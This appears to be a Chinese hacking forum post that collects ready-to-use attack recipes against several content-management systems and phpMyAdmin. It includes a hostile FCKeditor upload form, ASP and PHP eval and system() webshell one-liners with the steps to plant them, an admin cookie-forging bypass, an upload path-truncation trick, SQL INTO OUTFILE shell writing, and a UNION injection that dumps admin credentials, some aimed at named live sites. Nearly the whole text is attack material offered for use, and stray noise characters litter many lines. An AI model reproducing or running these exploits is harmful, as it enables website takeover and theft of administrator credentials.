<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
3 q% ^- f; T# u# n9 U5 q2 EUpload a new file:<br>; ^3 [* U& z4 v4 f9 E
<input type="file" name="NewFile" size="50"><br> r+ j' b' S5 U2 p) O1 {
<input id="btnUpload" type="submit" value="Upload">
, Z2 E* l2 @) M p' w</form>; \1 A N4 F6 Q! ~, ]+ h
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 I% M: y# _1 k! K; R4 b. }
/ E( S1 V+ s" o) V& i# h% X" {+ y, ?SDcms 后台拿webshell. X+ V* e9 e8 S5 z' j U
! H4 }( S% a. ^8 d第一种方法:
% v( a; H7 R" k, _: s: r进入后台-->系统管理-->系统设置-->系统设置->网站名称;
/ S0 Q( ?! i/ @" j% m把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
3 \0 _& U! e/ Y# E& _- h$ R5 g5 ^用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。) U: w) l, o( m" P& i4 @
第二种方法:
) r& G2 y# U1 @( E/ v2 Z( _0 d* }进入后台-->系统管理-->系统设置-->系统设置->上传设置;$ Y3 C# _, g R% t; K- C
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存! l0 K. Q+ H' p( F' _6 o4 ]
第三种方法:
* z2 g$ H& D, {1 h进入后台-->界面管理-->模板文件管理-->创建文件
7 [2 ~- F) N3 x文件名写入getshell.ashx
) t, m" _ D5 | ]: L# b& y5 L内容写入下面内容:
. ^5 i5 x/ n( A1 \0 |3 j/====================复制下面的=========================/
: G- W8 a0 j* h$ I: U<%@ WebHandler Language="C#" Class="Handler" %>3 `' s% }3 x' j: [8 g
using System;8 T1 ?$ i) z2 t9 }
using System.Web;) j" t$ r& e* i! I
using System.IO;
2 ?; P; a: s) N8 J2 hpublic class Handler : IHttpHandler {
3 e. z" U5 c/ E, ~' q/ Lpublic void ProcessRequest (HttpContext context) {
0 p' [3 ^# c1 D% ?context.Response.ContentType = "text/plain";3 ]2 ]# L8 C( Y5 F
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));1 P \' r: n3 p7 i& T; \
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
8 t- @3 I4 b% t2 A& x3 Kfile1.Flush();9 o' b; {! k3 S& T; v p( P( J/ I
file1.Close();
' K: N- v }/ b }}+ b* M+ ]) q* I! o# _2 \
public bool IsReusable {* l) g* C8 S1 z' D. f8 \4 X
get {) b% I% d+ m. j: G( R, D6 t
return false;; y0 i# ~# u0 |1 A; u
}
$ m8 V0 `* _- U' `" k* s" z: K}
/ S2 x c! W& I; a% }}4 P6 B. F' h1 m; m2 |
/=============================================/
+ Z+ m( ?# ?: B6 I5 d4 s7 u访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
v5 ]3 B: R6 H1 ]会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接2 T5 v2 T; B- z5 Z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: h7 D5 W3 }5 d& M! f2 v+ ?
; R5 ]1 d0 d" l$ b( R% h7 \: p
ESCMS网站管理系统0day
( y' J# n2 P& Y4 B/ I: d" s; q8 H) b% ~
后台登陆验证是通过admin/check.asp实现的$ R7 h% r+ V% t( S/ W0 \/ W9 x
+ L8 W: O3 t1 _
首先我们打开http://target.com/admin/es_index.html7 V) b$ u) F ^) v
然后在COOKIE结尾加上
$ t0 u8 a4 k% s- x. B; ESCMS$_SP2=ES_admin=st0p;
! K# v1 a# z8 q5 M- W0 K修改,然后刷新
R6 E4 {, Y, p; Y- G进后台了嘎..
% O [& Y( R7 H$ A然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL. ^, w4 \! i0 C, h- a
9 V. h! g! h6 M* _1 W+ ]9 Q
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
* e+ Z+ @" w$ F b嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp' _" c% J- f) P' \; R$ P+ L
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..$ Y) Q h; X" H5 J
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
/ M: k4 T7 [* a1 Q* k------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 j) K" _) R. U8 z8 m" u& ^' m- _
宁志网站管理系统后台无验证漏洞及修复. T! Q# r7 {+ Z/ y8 @
$ `( i7 R0 p- C, A# G, H; j网上搜了一下,好像没有发布.如有雷同纯粹巧合!! g% e4 l" |; q |1 _* t* b( ]
官方网站:www.ningzhi.net4 {2 P% O! F2 |1 L T) `
学校网站管理系统 V.2011版本 + j- H2 W0 [/ e c% s* Q7 V: w
http://down.chinaz.com/soft/29943.htm # Z5 \. `) Z n
其它版本(如:政府版等),自行下载. P* ?6 h, K- j* n
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~/ I5 a% j4 L9 t$ Z0 B5 Z
login.asp代码如下:" q1 }" X: {8 h
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
" h) t1 n- o) V! J* Z: w( Emanage.asp代码我就不帖出来了.反正也没验证.: J; ~2 F7 F& P6 H- l# R( h
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
$ B; G! L4 l- Z; P! C漏洞利用:( h8 B$ x. ?2 V
直接访问http://www.0855.tv/admin/manage.asp' j& z% Z) n: [2 H) p; H) l
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
% g0 j4 }1 \4 f8 Y----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, U, |* H/ H* x6 h$ a$ }; Z8 V$ G/ {
phpmyadmin拿shell的四种方法总结及修复* _% e; ^ J+ w1 r% r' y$ p' [
/ V- g9 [* K2 u9 t _! Q3 w8 V, r方法一:+ {% J" B" {/ B
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );) y0 S9 J+ I3 S7 P7 W
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
, ~, h0 }3 L% \3 v; S* J5 SSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';7 `: }6 Z D$ g0 c+ R4 }7 G& }
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
" j6 i3 E6 _) |: o 一句话连接密码:7on
5 }5 W' d m4 m6 X4 |0 ?方法二:
4 u6 a* L7 h0 H4 ~$ t读取文件内容: select load_file('E:/xamp/www/s.php'); I% O8 B: c4 Y0 M5 u5 c
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
2 w4 ~2 s% {- P0 ]" acmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'6 F( l7 T; W1 j! c
方法三:
, X+ s, @. h0 {8 q1 }6 RJhackJ版本 PHPmyadmin拿shell2 H) N1 F$ m# U
Create TABLE study (cmd text NOT NULL);5 c" d* i. z& \' X& M+ P
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');. ~7 [( P3 e; E/ i0 d
select cmd from study into outfile 'E:/wamp/www/7.php';* z; S, b7 J7 i7 c! t; t) l3 {* |
Drop TABLE IF EXISTS study;" b4 v5 u: C; ]% n
<?php eval($_POST[cmd])?>1 ~/ M+ X* d: Q/ Y5 A5 m1 o, T9 ^
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 j/ ]% L$ ~; ?1 {& ?
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1: \# r0 {% d. I0 [$ }
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
1 P7 W6 e8 q8 ]! j: tDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。9 h; y6 u* ?1 i3 g; x
方法四:
/ w2 G8 M2 v$ Y( gselect load_file('E:/xamp/www/study.php');' k9 d& V' E' S7 J; G. M
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
# \( j6 u @9 z) d然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
' I; d' Y! z3 \0 x& t; A* o-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ h, a# ]# B' H j: O, t- g: M# h+ y, F% o4 f
NO.001中学网站管理系统 Build 110628 注入漏洞
5 C% {) @2 y; c0 n& {
$ d4 L0 w W7 A ^NO.001中学网站管理系统功能模块:. z+ Y& v' v7 U J* y
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
3 z3 s% U1 }3 g, d$ |* B( P2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
/ g5 x6 ]2 M2 `9 ]8 h. s7 c3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息6 ?' u( w9 g4 ~ s# q5 X% q2 S$ v
4.视频图片管理:一级分类,动态添加视频或者图片等信息7 `$ { ^+ p/ s- n. Y- \/ u
5.留言管理:对留言,修改,删除、回复等管理
3 w. h: t6 ^. a# s7 w6.校友频道:包括校友资料excel导出、管理等功能
/ u& S) @0 U, |7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页" @; v" k4 Y3 u- p0 q; y5 j2 |
默认后台:admin/login.asp
, n2 J" y' W8 p/ X! s+ f官方演示:http://demo.001cms.net7 U8 u* }" W( |8 F, n/ i- v
源码下载地址:http://down.chinaz.com/soft/30187.htm- W# j5 L' J3 P. K
EXP:
/ @; o5 Q( ~# r# D$ \" n9 Q: Qunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin. `' N/ G5 z% Q5 m
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
# A$ ^: w5 A4 |) H# i R# L' rgetshell:后台有备份,你懂的
8 m$ X& B) \# H' B4 [% w. D另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。 B# Y' D& u. F6 ?
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |